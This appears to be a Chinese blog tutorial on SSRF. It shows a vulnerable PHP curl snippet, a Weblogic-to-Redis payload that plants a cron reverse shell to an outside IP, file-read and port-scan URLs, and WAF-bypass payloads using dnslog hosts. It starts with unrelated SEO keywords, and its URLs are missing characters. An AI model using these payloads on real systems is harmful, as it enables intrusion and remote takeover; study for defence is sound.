企业网站制作的市场,wordpress顶部广告,wordpress主题:yusi v2.0,专做定制型网站这不是马上准备就要护网了嘛#xff0c;如火如荼的报名ing#xff01;#xff01;#xff01;那么小编就来查缺补漏一下以前的web漏洞#xff0c;也顺便去收录一波poc#xff01;#xff01;#xff01;#xff01; 今天讲的主人公呢就是SSRF#xff0c;以前学的时候…这不是马上准备就要护网了嘛如火如荼的报名ing那么小编就来查缺补漏一下以前的web漏洞也顺便去收录一波poc 今天讲的主人公呢就是SSRF以前学的时候感觉有点没有学懂趁现在二刷一遍
1.SSRF的原理 SSRF (Server-Side Request Forgery) 服务器端请求伪造一种由攻击者构造请求由服务端发起请求的安全漏洞 能产生SSRF主要还得是归功于这三个函数而且还不对URL进行过滤 curl_exec() 执行curl会话fsockopen() 打开一个网络连接或者一个Unix的套接字file_get_contents() 将文件读入一个字符串
说起来可能会有一点干没事我们上一段代码来演示一下
?php
function curl($url){ $ch curl_init();// 设置URL和相应的选项curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); // 启用时会将头文件的信息作为数据流输出 // 抓取URL并把它传递给浏览器 curl_exec($ch);//关闭cURL资源并且释放系统资源 curl_close($ch);
}$url $_GET[url];
curl($url);
?
我们部署一下这个网页然后演示一下 然后我们在URL的后面加上参数模拟一下正常的网页跳转 正常是这样肯定没有问题但是黑客它能正常嘛 http://127.0.0.1/ssrf.php?urlfile:///C:/Windows/win.ini 这样就读取到了本地服务器的win.ini文件 对于SSRF其常用的协议 其中file和dict用的最多一个用于读取文件一个用于探测端口存活 2.SSRF的危害
ssrf吧也算是个中危有的时候它还可以直接getshell 对于最后一个Redis还没学不过也是老出名了
3.SSRF常见的出现场景
分享网页的功能转码服务网站翻译图片远程加载
4.SSRF常见的利用以及poc
1.Weblogic反弹shell
这里我就直接用的Vulhub上面的weblogic的SSRF来演示了搭环境我就不说了参考我以前的文章
直接访问这个路径
http://你的ip:7001/uddiexplorer/SearchPublicRegistries.jsp
然后就能看见这样的一个页面 先公布它漏洞的poc
http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearchoperatorhttp://127.0.0.1:7001抓个包可以看见问题就出现在它的operator这里直接应用外部的URL 所以就导致了SSRF 可以看见不同的端口返回的值是不一样的 POC如下
http://192.168.246.170:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearchoperatorhttp://172.25.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.246.1%2F9191%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc
因为我没开redis的原因但是你只要敲上这个代码它就是能反弹shell的
除此之外ssrf还是可以getshell的 2.探测端口存活
比如说我们发现一个ssrf的站点我们就可以通过它去探测端口存活
urldict://127.0.0.1:§80§ /后面的端口就直接在BP选范围为 1-65535就好
不过吐槽一下啊 这个确实有点慢还不如直接上nmap。。。。。 但是这个玩意不止能探测本地的端口还可以远程探测 3.读取本机的敏感资产或者文件
poc
file:etc/passwd
file:///C:/Windows/win.ini5.SSRF绕过WAF
以下直接分享一些绕WAF的POC有的时候可以用dnslog来作探针
1.利用的符号
http://www.baidu.com0c63a4a6.dnslog.biz //这里面是你的dnslog探针
dict://127.0.0.1:800c63a4a6.dnslog.biz.
2. 将 . 换成 。以及相应的符号
dict://127。0。0 。1:80
http://127。0。0 。1:80
3.一些协议的绕过
sftp://0c63a4a6.dnslog.biz
tftp://0c63a4a6.dnslog.biz
ldap://0c63a4a6.dnslog.biz //自行对相应的dnslog探针进行替换
4.还有就是一些工具了
grayddq/SSRF_payload: 本脚本旨在生成各类畸形URL链接进行探测使用的payload尝试绕过服务端ssrf限制。 (github.com)https://github.com/grayddq/SSRF_payload